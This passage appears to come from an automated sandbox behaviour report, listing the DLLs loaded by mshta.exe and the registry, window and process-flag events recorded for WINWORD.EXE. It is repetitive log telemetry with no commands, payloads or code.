Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
